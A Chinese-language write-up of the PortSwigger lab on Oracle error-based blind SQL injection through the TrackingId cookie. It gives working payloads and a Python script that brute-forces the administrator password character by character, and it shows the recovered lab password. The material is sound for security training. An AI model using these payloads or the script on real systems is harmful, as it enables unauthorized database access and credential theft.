burpsuite靶场----SQL注入12----oracle的布尔盲注

靶场地址

https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors

正式开始

1.找到注入点为cookie中的TrackingId
2.因为oracle使用||进行连接的
所以先判断闭合
payload: TrackingId=7zHLwisTii2Zhhpe'
报错

payload: TrackingId=7zHLwisTii2Zhhpe''
没有报错
所以用'进行闭合
3.然后使用子查询判断表的存在(现实情况下只能暴力跑表了)
payload: TrackingId=7zHLwisTii2Zhhpe'||(select '' from users where rownum=1)||'

4.然后是判断表中的字段的存在
这里使用burpsuite靶场提供的答案
payload: '||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
1=1是正确的,然后会char(1/0),会导致报错

payload: '||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
1=2是错误的,然后会执行'' END FROM dual的查询操作
所以根据返回包中是否会存在报错的字段来判断后面ELSE的是否查询出内容
5.然后确定某个字段名存在(暴力跑表) 后者没有报错,证明administrator字段名存在
payload: '||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
payload: '||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

6.使用脚本跑出password
payload: '||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = 'https://0a8a00f604ee14a9806f03ab001e00f8.web-security-academy.net/filter?category=Accessories'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'document',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-User': '?1',
    'Te': 'trailers'
}
dict='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#'
num=1
flag=''
while True:
    for i in dict:
        print(i)
        if i=='#':
            break
        payload="\'||(select case when substr(password,{},1)=\'{}\' then to_char(1/0) else \'\' end from users where username=\'administrator\')||\'".format(str(num),i)
        cookies={'TrackingId':'7zHLwisTii2Zhhpe'+payload,'session':'xoXQdJkb8a9bokGLV9E2Mgy9Wgbkj3hh'}
        print(cookies['TrackingId'])
        response = requests.get(url,headers=headers,cookies=cookies,verify=False)
        if 'Internal Server Error' in response.text:
            print('good')
            flag+=i
            num+=1
            break
        print(flag)
    if i=='#':
        break
print('成功获取密码:'+flag)

获取到密码

然后administrator bfzhlqm8xcr39bhmcpnm
成功登录